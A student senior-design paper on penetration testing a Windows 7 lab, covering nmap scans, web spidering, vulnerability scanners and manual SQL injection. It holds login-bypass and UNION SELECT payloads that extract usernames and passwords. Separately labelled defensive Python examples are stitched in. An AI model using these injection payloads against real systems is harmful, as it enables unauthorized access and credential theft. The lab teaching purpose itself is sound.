![Page 1: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/1.jpg)
Pentesting Windows
Prepared by
Chad Bartusick
In
Partial Fulfillment of the requirements
For
Senior Design – CSC/CTC 492
Department of Computer Science
California State University, Dominguez Hills, Fall 2014
Committee Members/Approval
Faculty advisor: _____________________  Signature: ______________________  Date: _______________
Committee member: _____________________  Signature: ______________________  Date: _______________
Committee member: _____________________  Signature: ______________________  Date: _______________
Department Chair: Dr. Mohsen Beheshti  Signature: ______________________  Date: _______________
Table of Contents
Approval sheet ................................................................ 1
Table of Contents ............................................................. 2
Abstract ...................................................................... 3
Introduction .................................................................. 4
Chapter 1 – Background ........................................................ 5
Section 1.1 – What is penetration testing? .................................... 6
Section 1.2 – Pre-Requisites .................................................. 7
Chapter 2 – Planning and Preparation .......................................... 8
Section 2.1 – Directive approach .............................................. 9
Section 2.2 – Prior Research and vulnerabilities ............................. 10
Chapter 3 – Information Gathering and analysis ............................... 11
Section 3.1 – Network Scanning ............................................ 12-13
Section 3.2 – Webapp Scanning ............................................. 14-15
Chapter 4 – Vulnerability Detection .......................................... 16
Section 4.1 – Host Vulnerability Scanning ................................. 17-18
Section 4.2 – Webapp Vulnerability Scanning ............................... 19-20
Section 4.3 – Manual detection ............................................ 21-23
Chapter 5 – Penetration Attempt .............................................. 24
Section 5.1 – Good ole Metasploit ......................................... 25-26
Section 5.2 – Webapp penetration and Database dump ........................ 27-28
Chapter 6 – Covering Tracks and Persistence .................................. 29
Section 6.1 – Keep calm…Clear the logs ....................................... 30
Section 6.2 – Botnets and Backdoors for Everyone! ............................ 31
Conclusion ................................................................... 32
Reference .................................................................... 33
Appendix .................................................................. 34-40
Abstract
In today's society, people do not fear any intrusion on their computer because they place their trust in the security of the internet and in the antivirus protection loaded on their personal computer. Through this paper I will demonstrate how recklessly false this belief is and how shockingly easy it is to break into Windows 7 computers or servers through multiple points of entry. The reason for this demonstration is to convey a message to those who are unaware of such potential threats, and for educational purposes. First, I demonstrate how quickly I am able to break in, and after that I will traverse some different methodologies and the processes professional penetration testers follow when penetrating networks or systems. The reason I'm choosing Windows 7 is because in today's corporate world every company uses Windows 7 for some form of productivity. Linux, another operating system, is a major player as well, but as for entry into a network, I want to find the path of least resistance, and Linux tends to be a bit more robust and secure. In addition to penetrating Windows 7, I will showcase a new tool I'm developing for enumerating user data once a system has been "rooted". This piece of Python code will gather system credentials and establish a simple botnet for later use. My goal is that the reader understands the serious concern over the lack of security in Windows 7, and that hackers trying to expand their knowledge in penetration testing gain a broader understanding of entry points. Hackers consumed by curiosity love to learn and possess personality characteristics of keen problem-solving skills and the ability to absorb and retain large amounts of seemingly meaningless details. This information will be their greatest weapon. This research paper will give you the tools and knowledge to start conducting your own pentest.
Introduction
This paper will focus on the main aspects of pentesting Windows 7. Within pentesting Windows 7, I will demonstrate the use of a collection of tools used to help facilitate the attack. A strong background in the OSI model and how TCP/IP works will help with the understanding of this paper. Windows is vulnerable in so many ways that I thought I'd present you with a staple setup example. The example contains a lab with Kali Linux as the attacking system; the victim system will be Windows 7 with a WAMP (Windows, Apache, MySQL, and PHP) stack. The victim will host a web app within WAMP called Mutillidae, which is a highly vulnerable webapp containing the OWASP (Open Web Application Security Project) top 10 vulnerabilities. Mutillidae will help simulate a web server hosting a variety of services that the victim might be providing to customers. Since we are covering most aspects, I will show introductory methods of pentesting only. The sheer amount of knowledge of webapp exploitation alone would easily exceed this paper 100 fold. Some example attacks we will conduct are brute forcing credentials, man in the middle attacks, sniffing credentials, SQL injection, cross site scripting, stealing sessions, and exploiting a known service vulnerability.
1. Background
First, a little background about myself. I have 2 years of industry experience working as a security analyst. Most of my projects were security engineering driven. During my two years I wrote quite a bit of Python code and have utilized all the web languages. I contributed to pentesting of webapp environments and also network pentests.

The history of pentesting started in the 1960s when a timesharing system was compromised. That system was named AN/FSQ-32. It was at that point in time, after the break-in, that researchers and analysts decided to begin conducting studies on breaking into systems. The actual term penetration test was coined during a conference by a group of individuals from the RAND Corporation and the NSA. This is when the term "Penetration Test" was born. This group warned of future generations being attacked, as the standard input and output was vulnerable to the malicious logic of humans writing hacking software.

Kali Linux, the attacking distribution, was born from a Debian Linux distribution. It was formerly known as Backtrack in the early 2000s. Kali is a collection of hacking tools. These tools are the swiss army knife of penetration testing. These tools are on Linux because the sheer amount of flexibility on Linux overshadows Windows. The tools will be discussed more in depth throughout the paper.

Windows 7, the successor to Windows Vista, was released in 2009 and is the most widely used operating system on the planet. Over 1000 core developers worked on Windows 7 and it has above 32 million lines of code, which in turn means more vulnerability. A contributing factor as to why hackers target Windows is because almost every major corporation uses Windows 7 for productivity.
1.1 What is penetration testing?
For most of you reading, I will assume you have some knowledge of what penetration testing is. If not, penetration testing is the art and science of breaking into a computer system. The process consists of 5 major steps; each step gets you additional information about the system. Once the test is conducted, you gather your findings and compile an intricate report for the customer. The sole purpose of a penetration test is to find and collect vulnerabilities. It is up to the customer whether you go further and start to capitalize on their systems. That is highly unlikely, for most customers usually want a skim of the network for vulnerabilities or a web app scan. Penetration testers do not fix the actual vulnerabilities; instead they advise the customers and point them in a direction of remediation. Penetration testing can be conducted on Windows and Linux as well as Mac. There are three different types of penetration tests, which are white box, gray box, and black box. White box penetration testing is conducted with full knowledge of the company and its resources. You might even get access to their source code for some services or applications. With gray boxing, you learn moderate information about the company; however, the information you get may be very powerful. Black boxing consists of no knowledge at all about the company you are testing. It is the most realistic type of penetration testing as it simulates outside attackers. I will be conducting a black box simulation, but obviously I know all the ins and outs, so technically this is a white box penetration test. Before I begin, I would like to share a couple of quotes on penetration testing that I abide by. The first: "Knowledge is power", Francis Bacon. This I find true and very important for penetration testing. The second: "The quieter you are, the more you can hear", Ram Dass, which means undetected surveillance is cumulative.
1.2 Pre-Requisites
What do you need to know for this paper and demonstration, you might ask? Well, you need to know a tad bit of Linux administration and some shell commands. You also need to know some Windows administration as well.

Learning penetration testing is quite obscure, forcing most, if not all, hackers to learn from other hackers. Pre-requisites are a bit misleading too, since a hacker's true motivation is to absorb and learn something new. Hackers are consumed with curiosity and love to learn. If you're passionate about becoming a full time penetration tester, you need to possess this characteristic. I will give you some insight on what penetration testers should know or eventually learn, but for the sake of this paper you only need to know what I listed above.

Most professional penetration testers know a wide variety of skills. These skills include Windows administration, Linux administration, LDAP, Active Directory, the OSI model, TCP/IP, packet analysis, RADIUS client/server, TACACS, Python or Perl, PHP, MySQL, Oracle, CMSs, and some knowledge about Samba. This list can extend even further as you get more directed toward embedded systems such as routers and wireless hacking. For the most part, a good chunk of what our skill requires is in that list. Penetration testers often pick very specific paths too; some may even choose to do reverse engineering of malware or engineering of malware for penetration purposes. The material above is accessible from books sold to the public and can be purchased at Amazon or Barnes and Noble. Knowledge does in fact hold a lot of power. You realize this power by knowing MySQL queries; for example, you can indeed dump out table data or inject data into the table. Make learning a passion and give it drive through pursuing security!
2. Preparation and planning
The very first step is to get your reporting and documentation organized and ready for what we are about to find. You may use any tool of your choice, but I personally use the VIM text editor for everything, including programming. I have witnessed others using Microsoft Word. There is a neat tool for both Windows and Linux called Dradis. It is a very exotic tool that collects data from NMAP and from user input as well. This tool organizes everything for you and can export all the data to most file types. This comes in handy when you are testing a very large subnet or multiple subnets. When documenting your findings, you need to screenshot as much as you can. Once you have some screenshots, you must write descriptions. The screenshots must be POC (proof of concept). Screenshots must essentially tell a story and show what data was extracted or exploited. For the most part, the customer does not want solely text, as text can be rather boring. List all your IPs according to their subnets, and list all the credentials in order of their services as well. When documenting an individual host with its vulnerabilities, you need to organize the highest priority vulnerability at the top and color code each in descending order, such as red, then orange, then green.

When conducting the test, you need to have your environment set up. This includes a laptop with Kali Linux or your favorite distribution, a couple of flash cards, and a wireless dongle with an attachable antenna. You should have all your tools installed if you wish to use Kali. For those who are not using Kali, I will explain each tool I am using. If you are a freelance penetration tester, it is essential to conduct business in a legal and professional manner. If you are working internally, you should have written authority over the test. The legal documents will contain an NDA (non-disclosure agreement) outlining what is "off limits" for you to touch in the company system.
2.1 Directive Approach
The directive approach is ideal if you can afford it. It consists of a team of penetration testers. For this type of approach, the team has split operations for testing, which can be highly effective, yielding the results needed in a short amount of time. Usually, pairs of testers are assigned to each step of the penetration testing process. For example, two testers will scan and do reconnaissance, and from there they will connect to Dradis, which centralizes the findings. Two other testers would start the vulnerability scans once the first team has found some additional hosts. Another team of two would then begin exploitation from the findings of the vulnerability scanning team. The last team of two would do post exploitation and persistence. The structure is cascading and frees us of time constraints for each individual group and tester. If there are any false positives within a group, there are more findings from the prior team still flowing into the Dradis database. Again, Dradis is optional; you can use any centralized tool you like. I participated on the defending side of this type of approach during the WRCCDC (Western Region Collegiate Cyber Defense Competition): you see waves of scans at first, then in a matter of minutes you start to see odd and unusual things happen on your machines, which gave our team little time to defend.

The directive approach is maintained by a captain who organizes the entire thing. The captain will oversee each area and decide if there is a vector on which he wants to focus more. This approach is also ideal for when certain members lack skill in a certain area but excel in another. This gives the team a focal point in their prowess. The team can also be remote and log in to attack if the legal documents permit that action. This gives the team greater flexibility.
2.2 Prior Research and Vulnerabilities.
If you do not know what vulnerabilities are, I will explain. Vulnerabilities are bugs and faults within the code that range over a variety of things. These vulnerabilities, whether it is input that isn't bounded by length or a lack of limits on SQL statements, can be used to generate an exploit. The exploit is written to do one thing, and that is exploiting the target system. There is code engineered within the exploit to help facilitate the exploitation. The exploit can be written in a multitude of languages. From there, we develop a payload, which launches the attack and contains the malicious code to execute. Usually the payload is a reverse shell, which we will discuss later.

Researching prior vulnerabilities is a great way to get ahead of the game when pentesting. If you are going to attack a company or a single party and you know what services they are known for, it would be to your advantage to find the vulnerabilities that exist for those current services. These vulnerabilities may be listed on the black market, or, if you are late, the company will have a patch notes area where they will be listed with a time stamp. One thing that may be helpful is to find a pattern in existing services. If they tend to have a lot of custom services, you may want to scan the upper region of the port numbers beyond the well known ports (1-1024).

Vulnerabilities exist for a short time in a state also called ZERO day, which is the day the exploits are discovered. There is a limited amount of time to use that exploit on a target system before it is patched. An easy but very useful site to use is http://exploit-db.com. This site contains a list of up-to-date exploits that are ready to use on zero day and within the weeks that follow on existing systems. Zero day is a very happy time for pentesters.
3. Information Gathering and Analysis
We begin our journey with the first step, "Information Gathering", also called reconnaissance. Since there are a total of five steps listed in some sources, I am going to combine reconnaissance with scanning.

I will start off with a proper definition for reconnaissance. It is as follows: "The first and most important step in an attack involves finding out as much information as possible about the TOE (Target of Evaluation). If a passive information gathering approach is taken it will not raise any alarms. Patience and creativity are also a necessity as this can be the longest phase of the attack." (DeFino 6).

The proper definition of scanning and reconnaissance from the book "Official Certified Ethical Hacker Review Guide" by Steven DeFino states that "The goal of scanning is to learn as much technical data about the systems as possible. Live hosts are found and the network is footprinted. The access points on each live host are determined. Finally, the services that are available are confirmed and the operating systems of each platform are verified. Policies and user information are gathered and, finally, vulnerabilities are assessed." (DeFino et al. 6).

One thing to mention from past experience: even though the first phase may be the longest, it certainly can be the fastest if you hit the target at the right time and gather what you need for easy access. However, most of the time it is the longest phase. There are two more vulnerability databases I need to mention, and those are http://cve.mitre.org and http://osvdb.org. Both of these are the most prominent vulnerability databases around.
3.1 Network Scanning
A small and easy discovery tool for passive reconnaissance is a tool called "Discover-Scripts". These tools will literally fetch and retrieve most of the passive reconnaissance items. It will save you loads of time that you can spend discovering other easy to obtain items. "The Hacker Playbook" by Peter Kim states, "This tool automates a lot of different searches in one tool. For example, it can search people within that organization or domains on all the common harvesting sites (e.g. LinkedIn), use common domain tools (e.g. goofile, goog-mail, theHarvester, search_email_collector, mydnstools) and link 3rd party tools to perform additional searching." (Kim 21)

After briefly going over reconnaissance, I want to move on to scanning. Nmap (Network Mapper) is the most popular tool for actively scanning networks. "Nmap Network Scanning" by Gordon "Fyodor" Lyon states, "Nmap ("Network Mapper") is a free and open source utility for network exploration and security auditing." (Lyon xxi). As an extension to this description he says, "Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) are running, and what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts." (Lyon xxi).

The use of Nmap is trivial; I will list some commands with a short description. This is where we actively start when pentesting a host or large network, finding points of interest on a single host or across large networks.
Try a ping sweep.
    nmap -sP -v [target range]
Try a list scan.
    nmap -sL -v [target range]
Try a protocol scan.
    nmap -sO -v [target IP]
Try to verify services.
    nmap -sV -v [target IP]
Try a normal connect scan.
    nmap -sT -v [target IP]
Try a stealth scan.
    nmap -sS -v [target IP]
Try an inverse scan: Xmas.
    nmap -sX -v [target IP]
Try an inverse scan: NULL.
    nmap -sN -v [target IP]
(DeFino et al. 58)
These findings should be filed and sorted for the next and upcoming phases of attack. I am assuming you already have knowledge of networking and standard TCP/IP.
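The connect, stealth, Xmas and NULL scans listed above differ only in the TCP flags they put on the wire, which is also how a defender recognizes them in a capture. The following is an added example, not code from the paper: it classifies each (source, destination port) flow in a constructed packet log by the scan type that produces that flag pattern, and flags sources that touch many ports or use inverse (NULL/Xmas) probes. The flag bit values are the standard TCP header positions; the log entries are made up for the example.

```python
"""Classify inbound TCP probe patterns by the nmap scan type that produces them.

Added example: this is not code from the paper. It runs over a constructed
packet log (source, destination port, TCP flag byte) as a defender would see it
in a firewall or sensor capture; no real capture is used.
"""
from collections import defaultdict

# Standard TCP header flag bits.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag patterns that never occur in legitimate client traffic.
INVERSE_SCANS = {"NULL scan (-sN)", "Xmas scan (-sX)"}


def classify_flow(flag_sequence):
    """Classify the ordered flag bytes one source sent to one destination port.

    -sT : SYN, then ACK   (the OS completes the three-way handshake)
    -sS : SYN, then RST   (half-open: torn down before the handshake completes)
    -sX : one segment with FIN, PSH and URG set
    -sN : one segment with no flags set
    """
    if not flag_sequence:
        return "empty"
    first, rest = flag_sequence[0], flag_sequence[1:]
    if first == 0:
        return "NULL scan (-sN)"
    if first == FIN | PSH | URG:
        return "Xmas scan (-sX)"
    if first == SYN:
        if any(f & ACK for f in rest):
            return "connect scan (-sT)"
        if any(f & RST for f in rest):
            return "SYN/stealth scan (-sS)"
        return "lone SYN (unfinished -sS or dropped connection)"
    return "other"


def scan_report(packets, port_threshold=5):
    """Group packets per source and flag sources that look like port scans.

    A source is reported as suspicious when it touches more than
    port_threshold distinct ports or uses any inverse (NULL/Xmas) probe.
    """
    flows = defaultdict(list)
    for src, dport, flags in packets:
        flows[(src, dport)].append(flags)

    report = {}
    for (src, dport), seq in flows.items():
        entry = report.setdefault(src, {"ports": 0, "types": defaultdict(int)})
        entry["ports"] += 1
        entry["types"][classify_flow(seq)] += 1

    for entry in report.values():
        entry["types"] = dict(entry["types"])
        entry["suspicious"] = (
            entry["ports"] > port_threshold
            or bool(INVERSE_SCANS & set(entry["types"]))
        )
    return report


# Constructed packet log: (source address, destination port, flags received).
PACKETS = [
    ("10.0.0.5", 22, SYN), ("10.0.0.5", 22, RST),       # half-open probes ...
    ("10.0.0.5", 80, SYN), ("10.0.0.5", 80, RST),
    ("10.0.0.5", 135, SYN), ("10.0.0.5", 135, RST),
    ("10.0.0.5", 445, SYN), ("10.0.0.5", 445, RST),
    ("10.0.0.5", 3389, SYN), ("10.0.0.5", 3389, RST),
    ("10.0.0.5", 8080, SYN), ("10.0.0.5", 8080, RST),   # ... across six ports
    ("10.0.0.9", 80, SYN), ("10.0.0.9", 80, ACK),       # one completed connection
    ("10.0.0.9", 80, PSH | ACK),
    ("10.0.0.7", 139, FIN | PSH | URG),                  # Xmas probe
    ("10.0.0.7", 445, 0),                                # NULL probe
]

if __name__ == "__main__":
    for src, entry in sorted(scan_report(PACKETS).items()):
        verdict = "SUSPICIOUS" if entry["suspicious"] else "ok"
        print(f"{src:<10} ports={entry['ports']} {entry['types']} -> {verdict}")
```

The port threshold is deliberately low for the constructed log; on a real sensor it would be tuned per network, while the inverse-scan rule needs no tuning because no normal client sends a NULL or Xmas segment.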
3.2 Webapp Scanning
Webapp scanning is essentially web page spidering. The Web Hacker's Handbook 2 states, "Various tools can perform automated spidering of websites. These tools can work by requesting a webpage, parsing it for links to other content, requesting these links and continuing recursively until no new content is discovered." (Stuttard et al. 74). Spidering is essential to the discovery of attack vectors. Burp Suite is a great tool to use when mapping a website. The Hacker Playbook states, "To spider your application, drop into the target tab, site map tab, right click on the domain you want to spider, and click "Spider this host". Once the spidering process is complete, Burp should have a good layout of exactly what the application looks like." (Kim 49).

[Figure 19 – Burp Suite Site Map, taken from The Hacker Playbook]

Some files and folders might not be listed in the spider listing. You may navigate to these manually if you know them offhand, or you can right click the site map, click "Engagement tools", then finally click "Discover Content". If the site has authentication on it, Burp may be configured to use HTTP Basic authentication, HTTP Digest authentication, and form based authentication. The Web Hacker's Handbook gives us a great tip for finding hidden content. "Many web servers contain a file named robots.txt in the web root that contains a list of URLs that the site does not want web spiders to visit or search engines to index. Sometimes, this file contains references to sensitive functionality, which you are certainly interested in spidering. Some spidering tools designed for attacking web applications check the robots.txt file and use all URLs within it as seeds in the spidering process. In this case, the robots.txt file may be counterproductive to the security of the web application." (Stuttard et al. 74). This robots.txt is listed at the top domain path, e.g. (www.example.com/robots.txt).

Once you have a general map of the site, you should have a list of good attack vectors. Some things you'll be looking for are listed by The Web Hacker's Handbook 2:
- Other, more peripheral application behavior, including off-site links, error messages, administrative and login functions, and the use of redirects
- The core security mechanisms and how they function – in particular, management of session state, access controls, and authentication mechanisms and supporting logic (user registration, password change, and account recovery)
- All different locations at which the application processes user-supplied input – every URL, query string parameter, item of POST data, and cookie
- The technologies employed on the server side, including static and dynamic pages, the types of request parameters employed, the use of SSL, web server software, interaction with databases, email systems, and other back-end components
(Stuttard et al. 98)

In detail, these items would be quite a bit to cover. These are the items to look for when spidering. Take note of the locations and what default value or key pair is listed. Knowing the server side software is very important as well.
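The spidering process and the robots.txt tip above come down to a short breadth-first crawl that records what the Stuttard list asks for. The following is an added example, not the paper's code and not Burp Suite: it crawls a constructed in-memory site (a dict of request path to response body, standing in for a live server) rather than any real host, seeds the crawl with the root page plus every robots.txt Disallow path, and records per page the query string parameters, the forms with their input names, and the off-site links. The host name victim.example and all page contents are made up for the example; the output is exactly the list of input points that a tester notes and that a developer needs to validate.

```python
"""Minimal site spider that builds the map the passage above describes.

Added example, not the paper's code and not Burp Suite. It crawls a constructed
in-memory "site" (a dict of path -> body) instead of a live host, seeds the crawl
from robots.txt Disallow entries, and records for each page the query string
parameters, the forms and their input names, and the off-site links.
"""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse

# Constructed stand-in for a web server: request path (with query) -> response body.
SITE = {
    "/robots.txt": "User-agent: *\nDisallow: /admin/\nDisallow: /backup/\n",
    "/": '<a href="/login.php">Login</a> <a href="/items.php?id=1">Items</a> '
         '<a href="http://vendor.example/help">Help</a>',
    "/login.php": '<form action="/login.php" method="post">'
                  '<input name="username"><input name="password" type="password">'
                  '</form>',
    "/items.php?id=1": '<a href="/">Home</a>',
    "/admin/": '<form action="/admin/users.php" method="get"><input name="uid"></form>',
    "/backup/": "Index of /backup",
}


def fetch_constructed(url):
    """Stand-in for an HTTP GET against the constructed site; None means 404."""
    u = urlparse(url)
    return SITE.get(u.path + ("?" + u.query if u.query else ""))


class LinkParser(HTMLParser):
    """Collect anchors and forms (action, method, input names) from one page."""

    def __init__(self):
        super().__init__()
        self.links, self.forms, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": (a.get("method") or "get").lower(),
                          "inputs": []}
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form["inputs"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def robots_disallowed(robots_body):
    """Paths a robots.txt asks crawlers to avoid; each one is a disclosed path."""
    paths = []
    for line in (robots_body or "").splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def spider(base, fetch):
    """Breadth-first crawl of one host, seeded with the root and robots.txt paths."""
    host = urlparse(base).netloc
    disclosed = robots_disallowed(fetch(urljoin(base, "/robots.txt")))
    queue = deque([base] + [urljoin(base, p) for p in disclosed])
    seen = set()
    site_map = {"pages": {}, "offsite": set(), "robots_disclosed": disclosed}
    while queue:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        body = fetch(url)
        if body is None:
            continue
        parser = LinkParser()
        parser.feed(body)
        entry = {"params": sorted(parse_qs(urlparse(url).query)), "forms": [], "links": []}
        for form in parser.forms:
            entry["forms"].append({**form, "action": urljoin(url, form["action"])})
        for href in parser.links:
            target = urljoin(url, href)
            if urlparse(target).netloc != host:
                site_map["offsite"].add(target)   # peripheral behaviour: off-site link
            else:
                entry["links"].append(target)
                queue.append(target)
        site_map["pages"][url] = entry
    return site_map


def input_points(site_map):
    """Every location where the application takes user-supplied input."""
    points = []
    for url, entry in site_map["pages"].items():
        if entry["params"]:
            points.append((url, "get", entry["params"]))
        for form in entry["forms"]:
            points.append((form["action"], form["method"], form["inputs"]))
    return points


if __name__ == "__main__":
    site_map = spider("http://victim.example/", fetch_constructed)
    print("robots.txt discloses:", site_map["robots_disclosed"])
    for point in input_points(site_map):
        print("input point:", point)
    print("off-site links:", sorted(site_map["offsite"]))
```

Note that the two paths the constructed robots.txt tries to hide (/admin/ and /backup/) are reached by the crawl before any page links to them, which is the counterproductive effect the quoted passage warns about; the fix on the server side is access control on those paths, not a robots.txt entry.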
4. Vulnerability Detection
After you have gathered your list of IP addresses and subnets containing possibly vulnerable services, you may also have a site map of a possibly badly developed web app you spidered from an Apache server running on a Windows 7 host. The next step is to probe and test these vectors of attack. First, the following diagram shows the ratio of web vulnerabilities.

[Figure 5 – Webapp Vulnerability Ratio, from Whitehatsec.com]

During the early 2000s, this was the ratio of software vulnerabilities. Although the statistics haven't greatly changed since then, we will not be getting into the actual finding of vulnerabilities in software, and instead the enumeration of existing ones.

[Figure 1 – Software Vulnerability Ratio, from research.microsoft.com]
4.1 Host Vulnerability Scanning
With the list of IP addresses from the previous step, you can now start your vulnerability scanner
and scan single targets or a range of targets from a subnet. When it comes down to which
vulnerability scanner to use, you have three choices. The first choice, OpenVAS, is my personal
favorite. OpenVAS is a free, community-driven scanner that is updated from the community and by
the community. The setup is rather long and very complex, and I must mention the setup can
sometimes break. The next option is the Nessus vulnerability scanner. Nessus also has a free
version, but without up-to-date plugins. Plugins in a vulnerability scanner are the mini-programs
that facilitate the detection of a vulnerability. Not having an up-to-date plugin database will be
your downfall. By the way, Nessus charges $1,500 for a single license. Nexpose is the last option,
and it is similar to Nessus in that it limits the features and plugins as well. Its licenses begin at
around $2,000. You can see why I prefer OpenVAS to any other scanner. OpenVAS is usually
already installed on Kali Linux as well, and they have made the setup seemingly easy from what I
have heard. For the sake of simplicity I will explain Nessus and Nexpose, since they are both used
in commercial environments. The Hacker Playbook explains, “If time is a large concern, I’ll actually
run a profile first to look for only known exploitable vulnerabilities and a second scan with the
default profile. This way, the first scan will complete in a fraction of the time and contain only
critical findings.” (Kim 35). The GUIs do not need any explaining, as they are all labeled and are
pretty straightforward. You input the IP address or subnet, select additional options for the scan,
and then launch it. Some of the scanners do not have a progress bar, so be patient; interrupting the
process can sometimes break the software. Below, the first image is Nexpose and the second is
Nessus.
NEXPOSE
Figure 8 – from The Hackers Handbook
NESSUS
Figure 9 – from The Hackers Handbook
These vulnerabilities will be listed with multiple ID numbers attached to them. For example, some
might have CVE, OSVDB, BID, or VUPEN identifiers. These are IDs into vulnerability databases.
4.2 Webapp Vulnerability Detection
After you have spidered the webapp you can now use Burp Suite to also probe for
vulnerabilities. My other favorite tools for probing for webapp vulnerabilities are OWASP ZAP
and w3af. We will talk about the Burp Suite active scanner. The Hacker Playbook states, “Once you
feel comfortable that you have identified an adequate portion of the site, you can start attacking
the parameters, requests, and looking for vulnerabilities.” (Kim 52). Kim explains, “This can be done
by right clicking on the parent domain and dropping down to ‘Actively scan this host’ (Image
below).” (Kim 53)
BURP SITE MAP
Figure 23 – from The Hacker Play Book
Once the scanner has finished running you will have a listing of potential vulnerabilities on your
webapp. The reason we also spidered it first was to give the scanner a FQDN to speed up the
process; otherwise it will scan the entire site, which might take quite a bit of time. The results will
be on the left-hand side in a vertical list. Upon clicking one of the pages, you will see a list of
vulnerabilities associated with that page. You can then click each one and evaluate whether it is a
false positive or not. For example, Burp Suite found an XSS vulnerability in the image below.
BURP SCANNER
Figure 24 - from The Hacker Play Book
To verify this is not a false positive, we click the XSS vulnerability and copy and paste the URL
with the exact parameters. Once we navigate to that page we find that the XSS exists: there is a
JavaScript alert window with the number 1, or any other value we specify within the alert call
from the attack. This is just one example of the many vulnerability detections on webapps. What is
really neat with OWASP ZAP is the fact that it will do all these things at once if you just put in the
IP address of the site with the port number, although it tends to get rather slow because of the
massive amounts of data going back and forth. One of the first bug hunting books I read as a child
was “Hunting Security Bugs” by Tom Gallagher et al. In the book they explain the following about
finding webapp bugs: “Use a fuzzer. Fuzzing is sometimes dismissed because its goal is to send
random junk to the component being tested. People often think that this won’t yield great results
and that targeted testing will cover these cases. Surprisingly, fuzzing can find bugs that aren’t
discovered through code review and targeted testing.” (Gallagher 72). Fuzzing is a technique in
which a tool feeds random characters and numbers into an input field, hoping the webapp or
application will fault and crash. That would signify a bug and a vulnerability.
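To make the false-positive check above concrete, here is an added example in Python; it is not from this paper, from Burp Suite, or from The Hacker Playbook. It assumes a hypothetical page that echoes a q parameter (the URL, page name and parameter are made up), shows the check a scanner performs (the payload comes back in the response with its markup intact), and sets the vulnerable rendering beside the same page with output encoding via html.escape, which is the fix a developer would apply.

```python
"""Triage a scanner's reflected-XSS finding: does the parameter come back unencoded?"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed URL for the demo; the host, page and the 'q' parameter are assumptions.
TEST_URL = "http://site.example/search.php?q=<script>alert(1)</script>"


def render_vulnerable(query: str) -> str:
    """Hypothetical page that copies the 'q' parameter into its HTML verbatim."""
    q = parse_qs(query).get("q", [""])[0]
    return f"<p>Results for: {q}</p>"


def render_hardened(query: str) -> str:
    """Same page with output encoding: any markup in 'q' is rendered as text."""
    q = parse_qs(query).get("q", [""])[0]
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def reflected_unencoded(payload: str, body: str) -> bool:
    """The check a scanner performs: the payload is present in the response with its
    angle brackets intact. Encoded output (&lt;script&gt;) does not count."""
    return payload in body


def triage(url: str, render) -> dict:
    """Replay the scanner's URL against a page renderer and report the verdict."""
    query = urlsplit(url).query
    payload = parse_qs(query).get("q", [""])[0]
    body = render(query)
    return {
        "payload": payload,
        "reflected_unencoded": reflected_unencoded(payload, body),
        "body": body,
    }


if __name__ == "__main__":
    for name, page in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(name, triage(TEST_URL, page))
```

Run against the vulnerable renderer the verdict is True (a real finding); against the hardened one the same URL yields False because the response carries `&lt;script&gt;`, which the browser never executes.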
4.3 Manual Detection
Once we have found some hosts and mapped some services to those hosts, if we are lucky we
will find some web servers, namely Apache, IIS, or Tomcat. These web servers may be mapped if
they are hosting dynamic web content. This dynamic web content could potentially be hosting
vulnerable elements, SQL statements, and so on. OWASP ZAP, Burp Suite and w3af are some of
the best all-in-one tools for webapp scanning and exploitation. SQL injection can happen on
webapp input such as forms or in POST and GET requests. I am going to focus on manual
findings on the webapp side. The first major OWASP vulnerability usually found in webapps is SQL
injection. “Professional Penetration Testing” by Thomas Wilhelm says, “According to NIST
Special Publication 800-95, SQL injection is a ‘technique used for manipulating Web services
that send SQL queries to a RDBMS [relational database management system] to alter, insert, or
delete data in a database’” (Wilhelm 326). To get everyone acquainted with some vulnerabilities
in SQL queries, Wilhelm gives us the example:
SELECT * FROM user_data WHERE last_name = 'Tom'
(Wilhelm 326)
The next example is what we can additionally add on to the query to make it pass back
everything in the database.
SELECT * FROM user_data WHERE last_name = 'Tom' OR '1' = '1'
(Wilhelm 326)
Since we added the logical OR operator, whether the username was correct or not, the query would
still return everything. The one thing missing from the end of his quote is “-- -”, which tells
MySQL to treat the rest of the line after the dashes as a comment; essentially you tell it not to
process anything after that. To put this into a scenario I will explain bypassing a login. The scenario
goes as follows: you find out that by placing a “ ' ” into the input field of a login form it displays an
error, because the developers did not escape known SQL characters. The error displays the current
table and columns. The Web Application Hacker’s Handbook 2, by Dafydd Stuttard et al., gives
us this example:
SELECT * FROM users WHERE username = 'marcus' AND password = 'secret'
(Stuttard et al 289)
Stuttard states, “For example, if an attacker knows that the username of the application
administrator is admin, he can log in as that user by supplying any password and the following
username: admin'--.” (Stuttard et al 289).
SELECT * FROM users WHERE username = 'admin'--' AND password = 'foo'
(Stuttard et al 289)
This essentially turns the query into
SELECT * FROM users WHERE username = 'admin'
(Stuttard et al 289)
The last example is manual extraction of data. From the above we have the basics of bypassing a
login and extracting data. For example, if we add a single apostrophe into a form field we get an
error. Chances are the error might list the table name. From there we can construct our UNION
statement to extract the records from the current table or other tables with the same data types, but
take note this only works for a matched number of fields. In order to find out how many fields there
are and each field’s respective data type, we can methodically guess by incrementing the number of
NULL values in the UNION statement until we pass with no error message. A NULL value matches
“any” data type.
' UNION SELECT null,null,null,null,null -- -
Since my demonstration has 5 fields we will use that as an example. After we find out that the
table has five fields we can start guessing the data types or extracting current table data.
' UNION SELECT null,Username,Password,null,null FROM accounts -- -
